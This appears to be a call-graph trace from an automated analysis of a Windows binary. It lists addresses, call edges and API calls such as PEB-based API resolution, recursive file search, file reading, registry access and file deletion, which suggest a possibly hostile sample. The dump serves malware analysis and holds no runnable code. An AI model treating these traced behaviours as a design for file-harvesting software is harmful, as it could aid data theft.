408386 9119->9120 9120->9073 9120->9074 9122 40816f 9121->9122 9123 4081b6 9122->9123 9124 4081fd 9122->9124 9135 4081ef 9122->9135 9126 405872 4 API calls 9123->9126 9125 405872 4 API calls 9124->9125 9128 408213 9125->9128 9127 4081cf 9126->9127 9129 405872 4 API calls 9127->9129 9130 405872 4 API calls 9128->9130 9131 4081df 9129->9131 9132 408222 9130->9132 9133 405872 4 API calls 9131->9133 9134 405872 4 API calls 9132->9134 9133->9135 9134->9135 9135->9079 9137 40808c 9136->9137 9138 4080d2 9137->9138 9139 408119 9137->9139 9150 40810b 9137->9150 9141 405872 4 API calls 9138->9141 9140 405872 4 API calls 9139->9140 9142 40812f 9140->9142 9143 4080eb 9141->9143 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 4080fb 9144->9146 9147 40813e 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9148->9150 9149->9150 9150->9079 9157 404a19 9151->9157 9153 404ba0 9153->9085 9160 4049ff 9154->9160 9156 404a44 9156->9084 9158 4031e5 4 API calls 9157->9158 9159 404a2c RegOpenKeyW 9158->9159 9159->9153 9161 4031e5 4 API calls 9160->9161 9162 404a12 RegCloseKey 9161->9162 9162->9156 9164 408534 9163->9164 9166 4085af 9164->9166 9173 4084ee 9164->9173 9166->9097 9168 4031e5 4 API calls 9167->9168 9169 4084c7 9168->9169 9169->9097 9171 4031e5 4 API calls 9170->9171 9172 4084e7 9171->9172 9172->9095 9174 4031e5 4 API calls 9173->9174 9175 408501 9174->9175 9175->9166 9177 4031e5 4 API calls 9176->9177 9178 408a06 9177->9178 9179 408b21 9178->9179 9180 4031e5 4 API calls 9178->9180 9179->9114 9183 408a32 9180->9183 9181 408b17 9211 403649 9181->9211 9183->9181 9202 403666 9183->9202 9186 408b0e 9208 40362f 9186->9208 9187 4031e5 4 API calls 9189 408a88 9187->9189 9189->9186 9190 4031e5 4 API calls 9189->9190 9191 408ac4 9190->9191 9192 405b6f 6 API calls 9191->9192 9193 408aff 9192->9193 9193->9186 9205 408508 9193->9205 9196 408744 9195->9196 9198 4086e2 9195->9198 9196->9114 9197 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9197->9198 9198->9196 9198->9197 9200 4031e5 4 API calls 9199->9200 9201 4036b5 9200->9201 9201->9114 9203 4031e5 4 API calls 9202->9203 9204 403679 9203->9204 9204->9186 9204->9187 9206 4031e5 4 API calls 9205->9206 9207 40851b 9206->9207 9207->9186 9209 4031e5 4 API calls 9208->9209 9210 403642 9209->9210 9210->9181 9212 4031e5 4 API calls 9211->9212 9213 40365c 9212->9213 9213->9179 9856 40f252 9857 404bee 6 API calls 9856->9857 9858 40f269 9857->9858 9859 404bee 6 API calls 9858->9859 9867 40f2ff 9858->9867 9860 40f282 9859->9860 9861 404bee 6 API calls 9860->9861 9862 40f290 9861->9862 9873 404c4e 9862->9873 9864 40f2a7 9865 405872 4 API calls 9864->9865 9864->9867 9866 40f2cd 9865->9866 9868 405872 4 API calls 9866->9868 9869 40f2dc 9868->9869 9870 405872 4 API calls 9869->9870 9871 40f2ee 9870->9871 9872 405762 4 API calls 9871->9872 9872->9867 9874 402b7c 2 API calls 9873->9874 9876 404c60 9874->9876 9875 404ca4 9875->9864 9876->9875 9877 4031e5 4 API calls 9876->9877 9878 404c8d 9877->9878 9878->9875 9879 402bab 2 API calls 9878->9879 9879->9875 9880 41045c 9881 4040bb 12 API calls 9880->9881 9882 410477 9881->9882 9883 41060b 9882->9883 9911 407851 9882->9911 9885 41048f 9887 407851 2 API calls 9885->9887 9891 410604 9885->9891 9886 403f9e 5 API calls 9886->9883 9888 4104a9 9887->9888 9893 4105e0 9888->9893 9894 405ae9 6 API calls 9888->9894 9896 41056f 9888->9896 9897 4105eb 9888->9897 9889 402bab 2 API calls 9889->9891 9890 402bab 2 API calls 9892 4105fb 9890->9892 9891->9886 9892->9889 9895 402bab 2 API calls 9893->9895 9893->9897 9894->9888 9895->9897 9896->9893 9898 4105d6 9896->9898 9900 412269 6 API calls 9896->9900 9897->9890 9897->9892 9899 402bab 2 API calls 9898->9899 9899->9893 9901 410580 9900->9901 9901->9898 9902 405872 4 API calls 9901->9902 9903 410599 9902->9903 9904 405872 4 API calls 9903->9904 9905 4105a9 9904->9905 9906 405872 4 API calls 9905->9906 9907 4105bb 9906->9907 9908 405872 4 API calls 9907->9908 9909 4105cd 9908->9909 9910 402bab 2 API calls 9909->9910 9910->9898 9912 407866 9911->9912 9913 402b7c 2 API calls 9912->9913 9914 407899 9912->9914 9913->9914 9914->9885 9275 40f561 9278 40f4b6 9275->9278 9279 413b28 6 API calls 9278->9279 9284 40f4bf 9279->9284 9280 405b6f 6 API calls 9280->9284 9281 402bab GetProcessHeap HeapFree 9281->9284 9282 413a58 13 API calls 9282->9284 9283 40f559 9284->9280 9284->9281 9284->9282 9284->9283 9288 403b64 9289 4031e5 4 API calls 9288->9289 9290 403b77 PathFileExistsW 9289->9290 9946 40d069 9947 404bee 6 API calls 9946->9947 9948 40d080 9947->9948 9949 404bee 6 API calls 9948->9949 9970 40d1e2 9948->9970 9950 40d099 9949->9950 9951 404bee 6 API calls 9950->9951 9952 40d0a7 9951->9952 9987 404ba7 9952->9987 9955 404bee 6 API calls 9956 40d0c5 9955->9956 9957 404c4e 6 API calls 9956->9957 9958 40d0dc 9957->9958 9959 404bee 6 API calls 9958->9959 9960 40d0eb 9959->9960 9961 404ba7 4 API calls 9960->9961 9962 40d0fa 9961->9962 9963 404bee 6 API calls 9962->9963 9964 40d109 9963->9964 9965 404c4e 6 API calls 9964->9965 9966 40d123 9965->9966 9967 405872 4 API calls 9966->9967 9966->9970 9968 40d14a 9967->9968 9969 405872 4 API calls 9968->9969 9971 40d159 9969->9971 9972 405872 4 API calls 9971->9972 9973 40d16b 9972->9973 9974 405781 4 API calls 9973->9974 9975 40d179 9974->9975 9976 405872 4 API calls 9975->9976 9977 40d18b 9976->9977 9978 405762 4 API calls 9977->9978 9979 40d19f 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d1b1 9980->9981 9982 405781 4 API calls 9981->9982 9983 40d1bf 9982->9983 9984 405872 4 API calls 9983->9984 9985 40d1d1 9984->9985 9986 405762 4 API calls 9985->9986 9986->9970 9988 4031e5 4 API calls 9987->9988 9989 404bca 9988->9989 9989->9955 9317 40f16e 9318 4056bf 2 API calls 9317->9318 9319 40f17b 9318->9319 9320 412093 20 API calls 9319->9320 9321 40f19e 9320->9321 9322 412093 20 API calls 9321->9322 9323 40f1b6 9322->9323 9324 412093 20 API calls 9323->9324 9325 40f1cc 9324->9325 9326 412093 20 API calls 9325->9326 9327 40f1e2 9326->9327 9328 413aca 4 API calls 9327->9328 9329 40f1ef 9328->9329 9330 405695 2 API calls 9329->9330 9331 40f1fa 9330->9331 9332 40ce71 9333 413b28 6 API calls 9332->9333 9334 40ce78 9333->9334 9335 405b6f 6 API calls 9334->9335 9339 40ce83 9335->9339 9336 40cec1 9337 403fbf 7 API calls 9336->9337 9338 40cecc 9337->9338 9342 403d74 19 API calls 9338->9342 9350 40cefb 9338->9350 9339->9336 9340 40ceba 9339->9340 9343 403d74 19 API calls 9339->9343 9341 402bab 2 API calls 9340->9341 9341->9336 9344 40cee7 9342->9344 9345 40cead 9343->9345 9346 402bab 2 API calls 9344->9346 9349 40cef4 9344->9349 9345->9340 9348 402bab 2 API calls 9345->9348 9346->9349 9347 402bab 2 API calls 9347->9350 9348->9340 9349->9347 9351 406472 9352 4031e5 4 API calls 9351->9352 9353 406484 Sleep 9352->9353 10063 40f204 10064 405781 4 API calls 10063->10064 10065 40f214 10064->10065 10066 4057df 13 API calls 10065->10066 10067 40f226 10066->10067 9411 403c08 9412 4031e5 4 API calls 9411->9412 9413 403c1a DeleteFileW 9412->9413 9414 410a09 9415 41219c 14 API calls 9414->9415 9416 410a1b 9415->9416 9417 41219c 14 API calls 9416->9417 9418 410a23 9417->9418 9419 41219c 14 API calls 9418->9419 9420 410a2c 9419->9420 9421 41219c 14 API calls 9420->9421 9422 410a38 9421->9422 9423 404b22 6 API calls 9422->9423 9424 410a4c 9423->9424 9425 410a7a 9424->9425 9426 403fbf 7 API calls 9424->9426 9427 410a5c 9426->9427 9428 410a71 9427->9428 9430 413a58 13 API calls 9427->9430 9429 402bab 2 API calls 9428->9429 9429->9425 9431 410a6b 9430->9431 9432 402bab 2 API calls 9431->9432 9432->9428 9433 40c509 9434 412093 20 API calls 9433->9434 9435 40c51e 9434->9435 9442 40910d 9443 404b22 6 API calls 9442->9443 9444 409124 9443->9444 9445 40917a 9444->9445 9446 405b6f 6 API calls 9444->9446 9447 40913e 9446->9447 9448 409173 9447->9448 9450 404b22 6 API calls 9447->9450 9449 402bab 2 API calls 9448->9449 9449->9445 9451 409153 9450->9451 9452 40916a 9451->9452 9453 409408 15 API calls 9451->9453 9454 402bab 2 API calls 9452->9454 9455 409164 9453->9455 9454->9448 9456 402bab 2 API calls 9455->9456 9456->9452 9460 410410 9461 4056bf 2 API calls 9460->9461 9462 41041b 9461->9462 9463 412093 20 API calls 9462->9463 9464 41043c 9463->9464 9465 413aca 4 API calls 9464->9465 9466 410449 9465->9466 9467 405695 2 API calls 9466->9467 9468 410454 9467->9468 9495 40c71a 9496 41219c 14 API calls 9495->9496 9497 40c728 9496->9497 10123 410b1a 10124 404bee 6 API calls 10123->10124 10125 410b31 10124->10125 10126 404bee 6 API calls 10125->10126 10136 410c6d 10125->10136 10127 410b5a 10126->10127 10128 404bee 6 API calls 10127->10128 10129 410b69 10128->10129 10130 404bee 6 API calls 10129->10130 10131 410b78 10130->10131 10132 404ba7 4 API calls 10131->10132 10133 410b86 10132->10133 10134 404ba7 4 API calls 10133->10134 10135 410b95 10134->10135 10135->10136 10137 405872 4 API calls 10135->10137 10138 410bd7 10137->10138 10139 405872 4 API calls 10138->10139 10140 410be8 10139->10140 10141 405872 4 API calls 10140->10141 10142 410bf9 10141->10142 10143 405781 4 API calls 10142->10143 10144 410c07 10143->10144 10145 405781 4 API calls 10144->10145 10148 410c15 10145->10148 10146 405762 4 API calls 10147 410c60 10146->10147 10147->10136 10149 403f9e 5 API calls 10147->10149 10155 410c4e 10148->10155 10156 405e5a 10148->10156 10149->10136 10152 4040bb 12 API calls 10153 410c44 10152->10153 10154 402bab 2 API calls 10153->10154 10154->10155 10155->10146 10157 402b7c 2 API calls 10156->10157 10158 405e72 10157->10158 10159 4031e5 4 API calls 10158->10159 10162 405ea3 10158->10162 10160 405e94 10159->10160 10161 402bab 2 API calls 10160->10161 10160->10162 10161->10162 10162->10152 10162->10155 10163 40f81c 10164 404bee 6 API calls 10163->10164 10165 40f833 10164->10165 10166 404bee 6 API calls 10165->10166 10180 40f94f 10165->10180 10167 40f85c 10166->10167 10168 404bee 6 API calls 10167->10168 10169 40f86b 10168->10169 10170 404bee 6 API calls 10169->10170 10171 40f87a 10170->10171 10172 404bee 6 API calls 10171->10172 10173 40f888 10172->10173 10174 404ba7 4 API calls 10173->10174 10175 40f897 10174->10175 10176 405872 4 API calls 10175->10176 10175->10180 10177 40f8d8 10176->10177 10178 405872 4 API calls 10177->10178 10179 40f8ea 10178->10179 10181 405872 4 API calls 10179->10181 10182 40f8fa 10181->10182 10183 405872 4 API calls 10182->10183 10184 40f90c 10183->10184 10185 405781 4 API calls 10184->10185 10186 40f91d 10185->10186 10187 4040bb 12 API calls 10186->10187 10188 40f92d 10187->10188 10189 405762 4 API calls 10188->10189 10190 40f93f 10189->10190 10190->10180 10191 403f9e 5 API calls 10190->10191 10191->10180 9510 402c1f 9511 4031e5 4 API calls 9510->9511 9512 402c31 LoadLibraryW 9511->9512 10201 407e1f 10202 407e61 10201->10202 10203 407e2c 10201->10203 10204 407eb6 10202->10204 10205 407ea6 10202->10205 10212 405872 4 API calls 10202->10212 10207 402bab 2 API calls 10203->10207 10210 407e3e 10203->10210 10211 407e51 10203->10211 10209 402bab 2 API calls 10204->10209 10204->10211 10205->10204 10206 402bab 2 API calls 10205->10206 10206->10204 10207->10210 10208 402bab 2 API calls 10208->10211 10209->10211 10210->10208 10215 407ed4 10210->10215 10213 402bab 2 API calls 10211->10213 10211->10215 10214 407e86 10212->10214 10213->10215 10216 405872 4 API calls 10214->10216 10217 407e96 10216->10217 10218 405872 4 API calls 10217->10218 10218->10205 9525 405924 9526 4031e5 4 API calls 9525->9526 9527 405937 StrStrW 9526->9527 10227 410927 10228 4044ee 7 API calls 10227->10228 10229 41093d 10228->10229 10230 4056bf 2 API calls 10229->10230 10241 4109a4 10229->10241 10232 410954 10230->10232 10231 4044ee 7 API calls 10231->10232 10232->10231 10234 410990 10232->10234 10235 402bab 2 API calls 10232->10235 10242 41080e 10232->10242 10236 413aca 4 API calls 10234->10236 10235->10232 10237 410998 10236->10237 10238 405695 2 API calls 10237->10238 10239 41099e 10238->10239 10240 402bab 2 API calls 10239->10240 10240->10241 10243 410821 10242->10243 10253 41091f 10243->10253 10254 410701 10243->10254 10246 405872 4 API calls 10247 410900 10246->10247 10248 405872 4 API calls 10247->10248 10249 41090d 10248->10249 10250 405872 4 API calls 10249->10250 10251 410919 10250->10251 10252 402bab 2 API calls 10251->10252 10252->10253 10253->10232 10255 405f08 4 API calls 10254->10255 10257 410713 10255->10257 10256 410804 10256->10246 10256->10253 10257->10256 10258 402b7c 2 API calls 10257->10258 10262 410748 10258->10262 10259 4107fd 10260 402bab 2 API calls 10259->10260 10260->10256 10261 402b7c 2 API calls 10264 4107ad 10261->10264 10262->10259 10262->10261 10263 402bab 2 API calls 10263->10259 10264->10263 10265 40d726 10266 404bee 6 API calls 10265->10266 10267 40d73f 10266->10267 10268 405872 4 API calls 10267->10268 10280 40db63 10267->10280 10271 40d761 10268->10271 10269 404bee 6 API calls 10269->10271 10270 405872 4 API calls 10270->10271 10271->10269 10271->10270 10273 40d971 10271->10273 10272 404ba7 4 API calls 10272->10273 10273->10272 10274 405781 4 API calls 10273->10274 10279 40d9bb 10273->10279 10274->10273 10275 404c4e 6 API calls 10275->10279 10276 405781 4 API calls 10276->10279 10277 4037be 4 API calls 10277->10279 10278 405872 4 API calls 10278->10279 10279->10275 10279->10276 10279->10277 10279->10278 10279->10280 9583 40f12f 9584 41219c 14 API calls 9583->9584 9585 40f13f 9584->9585 9586 41219c 14 API calls 9585->9586 9587 40f14c 9586->9587 9588 41219c 14 API calls 9587->9588 9589 40f159 9588->9589 9590 41219c 14 API calls 9589->9590 9591 40f166 9590->9591 9598 40ed35 9599 4056bf 2 API calls 9598->9599 9600 40ed42 9599->9600 9601 412093 20 API calls 9600->9601 9602 40ed63 9601->9602 9603 412093 20 API calls 9602->9603 9604 40ed73 9603->9604 9605 413aca 4 API calls 9604->9605 9606 40ed80 9605->9606 9607 405695 2 API calls 9606->9607 9608 40ed8e 9607->9608 8052 40f3c5 8057 41219c 8052->8057 8055 41219c 14 API calls 8056 40f3e1 8055->8056 8058 4121b1 8057->8058 8074 40f3d3 8057->8074 8059 4121be 8058->8059 8062 4121c5 8058->8062 8105 413ba4 8059->8105 8061 4121ca 8075 404056 8061->8075 8062->8061 8068 412210 8062->8068 8063 4121c3 8063->8074 8082 405b6f 8063->8082 8067 41224d 8071 402bab 2 API calls 8067->8071 8067->8074 8068->8074 8110 403fbf 8068->8110 8071->8074 8074->8055 8121 402b7c GetProcessHeap RtlAllocateHeap 8075->8121 8077 404066 8079 404095 8077->8079 8123 4031e5 8077->8123 8079->8063 8081 402bab 2 API calls 8081->8079 8083 405b7d 8082->8083 8084 402b7c 2 API calls 8083->8084 8086 405b99 8084->8086 8085 405c02 8085->8067 8095 413a58 8085->8095 8086->8085 8159 4059b8 8086->8159 8088 405c09 8091 402bab 2 API calls 8088->8091 8089 405bba 8089->8088 8090 402b7c 2 API calls 8089->8090 8092 405bdd 8090->8092 8091->8085 8092->8088 8093 405be4 8092->8093 8094 402bab 2 API calls 8093->8094 8094->8085 8096 412245 8095->8096 8097 413a63 8095->8097 8118 402bab 8096->8118 8097->8096 8162 405781 8097->8162 8100 405781 4 API calls 8101 413aa0 8100->8101 8165 4057df 8101->8165 8104 405781 4 API calls 8104->8096 8106 413bad 8105->8106 8107 404056 6 API calls 8106->8107 8109 413bb8 8106->8109 8108 413bc5 8107->8108 8108->8063 8109->8063 8111 402b7c 2 API calls 8110->8111 8112 403fcf 8111->8112 8117 403ff4 8112->8117 8284 403b98 8112->8284 8115 403ff8 GetLastError 8116 402bab 2 API calls 8115->8116 8116->8117 8117->8063 8119 402bb4 GetProcessHeap HeapFree 8118->8119 8120 402bc6 8118->8120 8119->8120 8120->8067 8122 402b98 8121->8122 8122->8077 8124 4031f3 8123->8124 8125 403236 8123->8125 8124->8125 8127 403208 8124->8127 8134 4030a5 8125->8134 8140 403263 8127->8140 8128 403258 8128->8079 8128->8081 8130 4031e5 4 API calls 8130->8128 8131 40320d 8131->8128 8132 4030a5 4 API calls 8131->8132 8133 403224 8132->8133 8133->8128 8133->8130 8146 402ca4 8134->8146 8136 4030b0 8137 4030b5 8136->8137 8150 4030c4 8136->8150 8137->8133 8141 40326d 8140->8141 8142 402b7c 2 API calls 8141->8142 8145 4032b7 8141->8145 8143 40328c 8142->8143 8144 402b7c 2 API calls 8143->8144 8144->8145 8145->8131 8147 403079 8146->8147 8149 40307c 8147->8149 8154 40317b GetPEB 8147->8154 8149->8136 8153 4030eb 8150->8153 8151 4030c0 8151->8133 8153->8151 8156 402c03 8153->8156 8155 40319b 8154->8155 8155->8149 8157 4031e5 3 API calls 8156->8157 8158 402c15 GetProcAddress 8157->8158 8158->8151 8160 4031e5 4 API calls 8159->8160 8161 4059cb 8160->8161 8161->8089 8180 405797 8162->8180 8164 405792 8164->8100 8166 4057eb 8165->8166 8179 405832 8165->8179 8166->8179 8190 4040bb 8166->8190 8169 405839 8178 405853 8169->8178 8217 405627 8169->8217 8170 40582c 8214 403f9e 8170->8214 8177 403f9e 5 API calls 8177->8179 8228 405762 8178->8228 8179->8096 8179->8104 8181 4057a1 8180->8181 8182 4057bd 8180->8182 8181->8182 8184 4056fc 8181->8184 8182->8164 8185 405714 8184->8185 8186 402b7c 2 API calls 8185->8186 8188 405730 8186->8188 8187 405752 8187->8182 8188->8187 8189 402bab 2 API calls 8188->8189 8189->8187 8191 4031e5 4 API calls 8190->8191 8192 4040d5 CreateFileW 8191->8192 8193 4040f8 8192->8193 8194 40418d 8192->8194 8195 4031e5 4 API calls 8193->8195 8196 404183 8194->8196 8234 403c90 8194->8234 8202 404105 8195->8202 8196->8169 8196->8170 8196->8179 8200 40416d 8231 403c40 8200->8231 8202->8200 8206 4031e5 4 API calls 8202->8206 8204 4040bb 9 API calls 8207 4041c8 8204->8207 8205 402bab 2 API calls 8205->8196 8208 404131 VirtualAlloc 8206->8208 8207->8205 8208->8200 8209 404142 8208->8209 8210 4031e5 4 API calls 8209->8210 8211 40414f ReadFile 8210->8211 8211->8200 8212 404160 8211->8212 8213 4031e5 4 API calls 8212->8213 8213->8200 8215 4031e5 4 API calls 8214->8215 8216 403fb1 VirtualFree 8215->8216 8216->8179 8218 4031e5 4 API calls 8217->8218 8219 40563a 8218->8219 8220 405872 8219->8220 8222 405881 8220->8222 8221 4058bc 8223 405797 4 API calls 8221->8223 8225 4058af 8221->8225 8222->8221 8281 4058d4 8222->8281 8223->8225 8225->8178 8227 405781 4 API calls 8227->8221 8229 405781 4 API calls 8228->8229 8230 405770 8229->8230 8230->8177 8232 4031e5 4 API calls 8231->8232 8233 403c52 CloseHandle 8232->8233 8233->8196 8235 403ca3 8234->8235 8238 403caa 8234->8238 8261 405dc5 8235->8261 8237 404056 6 API calls 8239 403cbe 8237->8239 8238->8237 8240 403d3a 8238->8240 8241 403d2e 8239->8241 8242 403d17 8239->8242 8243 403ccf 8239->8243 8240->8196 8257 403c59 8240->8257 8241->8240 8245 402bab 2 API calls 8241->8245 8246 405b6f 6 API calls 8242->8246 8244 405b6f 6 API calls 8243->8244 8248 403cdd 8244->8248 8245->8240 8247 403d14 8246->8247 8250 402bab 2 API calls 8247->8250 8249 405b6f 6 API calls 8248->8249 8251 403cee 8249->8251 8250->8241 8251->8247 8266 403d4d 8251->8266 8254 403d0b 8256 402bab 2 API calls 8254->8256 8256->8247 8258 403c21 8257->8258 8259 4031e5 4 API calls 8258->8259 8260 403c33 8259->8260 8260->8204 8260->8207 8275 406799 8261->8275 8263 405dd5 8264 402b7c 2 API calls 8263->8264 8265 405dfe 8264->8265 8265->8238 8278 403bb7 8266->8278 8268 403cfe 8268->8254 8269 403c62 8268->8269 8270 403d4d 5 API calls 8269->8270 8271 403c6d 8270->8271 8272 403c72 8271->8272 8273 4031e5 4 API calls 8271->8273 8272->8254 8274 403c87 CreateDirectoryW 8273->8274 8274->8254 8276 4031e5 4 API calls 8275->8276 8277 4067ad 8276->8277 8277->8263 8279 4031e5 4 API calls 8278->8279 8280 403bc9 GetFileAttributesW 8279->8280 8280->8268 8282 405797 4 API calls 8281->8282 8283 4058a8 8282->8283 8283->8225 8283->8227 8285 4031e5 4 API calls 8284->8285 8286 403baa 8285->8286 8286->8115 8286->8117 9765 40ebc6 9766 4040bb 12 API calls 9765->9766 9767 40ebdf 9766->9767 9768 40ecd7 9767->9768 9785 407795 9767->9785 9771 4056bf 2 API calls 9784 40ec12 9771->9784 9772 403f9e 5 API calls 9772->9768 9773 40ecb5 9774 402bab 2 API calls 9773->9774 9775 40ecbd 9774->9775 9776 413aca 4 API calls 9775->9776 9777 40ecc7 9776->9777 9779 405695 2 API calls 9777->9779 9778 407908 GetProcessHeap RtlAllocateHeap 9778->9784 9780 40eccd 9779->9780 9780->9772 9781 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9781->9784 9783 402bab GetProcessHeap HeapFree 9783->9784 9784->9773 9784->9778 9784->9781 9784->9783 9796 412269 9784->9796 9786 4077ab 9785->9786 9792 4077b3 9786->9792 9803 405ae9 9786->9803 9788 4077e1 9789 407802 9788->9789 9790 4077f8 9788->9790 9788->9792 9793 402b7c 2 API calls 9789->9793 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9771 9792->9780 9794 407811 9793->9794 9795 402bab 2 API calls 9794->9795 9795->9792 9819 40374e 9796->9819 9799 412299 9799->9784 9802 402bab 2 API calls 9802->9799 9804 405af7 9803->9804 9805 402b7c 2 API calls 9804->9805 9807 405b03 9805->9807 9806 405b5a 9806->9788 9807->9806 9816 405998 9807->9816 9809 405b21 9810 405b61 9809->9810 9811 402b7c 2 API calls 9809->9811 9812 402bab 2 API calls 9810->9812 9813 405b39 9811->9813 9812->9806 9813->9810 9814 405b40 9813->9814 9815 402bab 2 API calls 9814->9815 9815->9806 9817 4031e5 4 API calls 9816->9817 9818 4059ab 9817->9818 9818->9809 9820 402b7c 2 API calls 9819->9820 9822 40375f 9820->9822 9821 4037a3 9821->9799 9826 4037be 9821->9826 9822->9821 9823 4031e5 4 API calls 9822->9823 9824 40378f 9823->9824 9824->9821 9825 402bab 2 API calls 9824->9825 9825->9821 9827 4031e5 4 API calls 9826->9827 9828 4037e2 9827->9828 9829 402b7c 2 API calls 9828->9829 9835 40382b 9828->9835 9830 403802 9829->9830 9831 403832 9830->9831 9833 403809 9830->9833 9832 4036a3 4 API calls 9831->9832 9832->9835 9834 4036a3 4 API calls 9833->9834 9834->9835 9835->9802 8884 410cd1 8889 412093 8884->8889 8887 412093 20 API calls 8888 410cff 8887->8888 8891 4120a5 8889->8891 8910 410cf1 8889->8910 8890 4120b3 8892 404056 6 API calls 8890->8892 8891->8890 8896 412100 8891->8896 8893 4120ba 8892->8893 8894 405b6f 6 API calls 8893->8894 8895 412152 8893->8895 8893->8910 8898 412125 8894->8898 8911 403d74 8895->8911 8897 403fbf 7 API calls 8896->8897 8896->8910 8897->8893 8898->8895 8902 412139 8898->8902 8903 41214d 8898->8903 8901 41218c 8905 402bab 2 API calls 8901->8905 8901->8910 8907 402bab 2 API calls 8902->8907 8906 402bab 2 API calls 8903->8906 8904 402bab 2 API calls 8904->8901 8905->8910 8906->8895 8908 41213e 8907->8908 8909 402bab 2 API calls 8908->8909 8909->8910 8910->8887 8912 403d87 8911->8912 8913 403ea3 8912->8913 8914 405b6f 6 API calls 8912->8914 8915 405b6f 6 API calls 8913->8915 8916 403da3 8914->8916 8917 403eb9 8915->8917 8916->8913 8919 4031e5 4 API calls 8916->8919 8918 4031e5 4 API calls 8917->8918 8925 403f6f 8917->8925 8920 403ed3 FindFirstFileW 8918->8920 8921 403dbc FindFirstFileW 8919->8921 8937 403f8d 8920->8937 8941 403ee8 8920->8941 8932 403e9c 8921->8932 8942 403dd1 8921->8942 8922 402bab 2 API calls 8922->8925 8923 402bab 2 API calls 8923->8913 8924 4031e5 4 API calls 8926 403e84 FindNextFileW 8924->8926 8925->8901 8925->8904 8927 403e96 8926->8927 8926->8942 8951 403bef 8927->8951 8928 4031e5 4 API calls 8931 403f50 FindNextFileW 8928->8931 8930 405b6f 6 API calls 8930->8941 8934 403f87 8931->8934 8931->8941 8932->8923 8933 405b6f 6 API calls 8933->8942 8935 403bef 5 API calls 8934->8935 8935->8937 8936 403f75 8938 402bab 2 API calls 8936->8938 8937->8922 8940 403f7b 8938->8940 8939 403d74 15 API calls 8939->8942 8944 403bef 5 API calls 8940->8944 8941->8928 8941->8930 8941->8936 8945 402bab 2 API calls 8941->8945 8954 40fa23 8941->8954 8942->8924 8942->8933 8942->8939 8943 402bab 2 API calls 8942->8943 8946 403f63 8942->8946 8943->8942 8944->8925 8945->8941 8947 402bab 2 API calls 8946->8947 8948 403f69 8947->8948 8949 403bef 5 API calls 8948->8949 8949->8925 8952 4031e5 4 API calls 8951->8952 8953 403c01 FindClose 8952->8953 8953->8932 8955 40fa39 8954->8955 8956 410293 8955->8956 8957 405b6f 6 API calls 8955->8957 8956->8941 8958 40ffcc 8957->8958 8958->8956 8959 4040bb 12 API calls 8958->8959 8960 40ffeb 8959->8960 8961 41028c 8960->8961 8963 41027d 8960->8963 8965 402b7c 2 API calls 8960->8965 8962 402bab 2 API calls 8961->8962 8962->8956 8964 403f9e 5 API calls 8963->8964 8964->8961 8966 41001e 8965->8966 8966->8963 8967 40a423 4 API calls 8966->8967 8968 41004a 8967->8968 8969 4031e5 4 API calls 8968->8969 8970 41005c 8969->8970 8971 4031e5 4 API calls 8970->8971 8972 410079 8971->8972 8973 4031e5 4 API calls 8972->8973 8974 410096 8973->8974 8975 4031e5 4 API calls 8974->8975 8976 4100b0 8975->8976 8977 4031e5 4 API calls 8976->8977 8978 4100cd 8977->8978 8979 4031e5 4 API calls 8978->8979 8980 4100ea 8979->8980 9010 412516 8980->9010 8982 4100fd 8983 40642c 5 API calls 8982->8983 8984 41013e 8983->8984 8985 410142 8984->8985 8986 41019f 8984->8986 8987 40488c 5 API calls 8985->8987 8989 4031e5 4 API calls 8986->8989 8988 410151 8987->8988 8990 41019c 8988->8990 8991 404866 4 API calls 8988->8991 9004 4101bb 8989->9004 8992 41022a 8990->8992 8994 40642c 5 API calls 8990->8994 8993 410163 8991->8993 9000 413a58 13 API calls 8992->9000 8996 41018e 8993->8996 8999 406c4c 6 API calls 8993->8999 8995 410201 8994->8995 8997 410205 8995->8997 8998 41022f 8995->8998 9001 403c40 5 API calls 8996->9001 9002 4126a7 7 API calls 8997->9002 9013 4125db 8998->9013 9005 410178 8999->9005 9006 41026e 9000->9006 9001->8990 9002->8992 9007 4031e5 4 API calls 9004->9007 9008 406c4c 6 API calls 9005->9008 9009 402bab 2 API calls 9006->9009 9007->8990 9008->8996 9009->8963 9011 4031e5 4 API calls 9010->9011 9012 412539 9011->9012 9012->8982 9014 40488c 5 API calls 9013->9014 9015 4125ec 9014->9015 9016 4031e5 4 API calls 9015->9016 9022 41269f 9015->9022 9017 412609 9016->9017 9018 41268f 9017->9018 9019 4031e5 4 API calls 9017->9019 9020 403c40 5 API calls 9018->9020 9021 41262a 9019->9021 9020->9022 9023 412675 9021->9023 9030 4124f1 9021->9030 9022->8992 9025 4031e5 4 API calls 9023->9025 9025->9018 9027 412663 9029 4031e5 4 API calls 9027->9029 9028 4124f1 4 API calls 9028->9027 9029->9023 9031 4031e5 4 API calls 9030->9031 9032 412503 9031->9032 9032->9027 9032->9028 9219 4049dc 9220 4031e5 4 API calls 9219->9220 9221 4049ef 9220->9221 9918 40cddd 9919 405b6f 6 API calls 9918->9919 9920 40cdee 9919->9920 9921 413a58 13 API calls 9920->9921 9923 40ce06 9920->9923 9925 40ce00 9921->9925 9922 40ce59 9923->9922 9924 405b6f 6 API calls 9923->9924 9927 40ce1c 9924->9927 9926 402bab 2 API calls 9925->9926 9926->9923 9927->9922 9928 40ce52 9927->9928 9929 403d74 19 API calls 9927->9929 9930 402bab 2 API calls 9928->9930 9931 40ce45 9929->9931 9930->9922 9931->9928 9932 402bab 2 API calls 9931->9932 9932->9928 9222 40ecde 9223 412093 20 API calls 9222->9223 9224 40ecfd 9223->9224 9225 412093 20 API calls 9224->9225 9226 40ed0d 9225->9226 9230 40e8df 9231 412093 20 API calls 9230->9231 9232 40e8f8 9231->9232 9233 412093 20 API calls 9232->9233 9234 40e908 9233->9234 9241 404b22 9234->9241 9236 40e91c 9237 40e936 9236->9237 9240 40e93d 9236->9240 9248 40e944 9236->9248 9239 402bab 2 API calls 9237->9239 9239->9240 9242 402b7c 2 API calls 9241->9242 9243 404b33 9242->9243 9246 404b66 9243->9246 9257 4049b3 9243->9257 9246->9236 9247 402bab 2 API calls 9247->9246 9249 4056bf 2 API calls 9248->9249 9250 40e952 9249->9250 9251 4057df 13 API calls 9250->9251 9256 40e976 9250->9256 9252 40e966 9251->9252 9253 413aca 4 API calls 9252->9253 9254 40e970 9253->9254 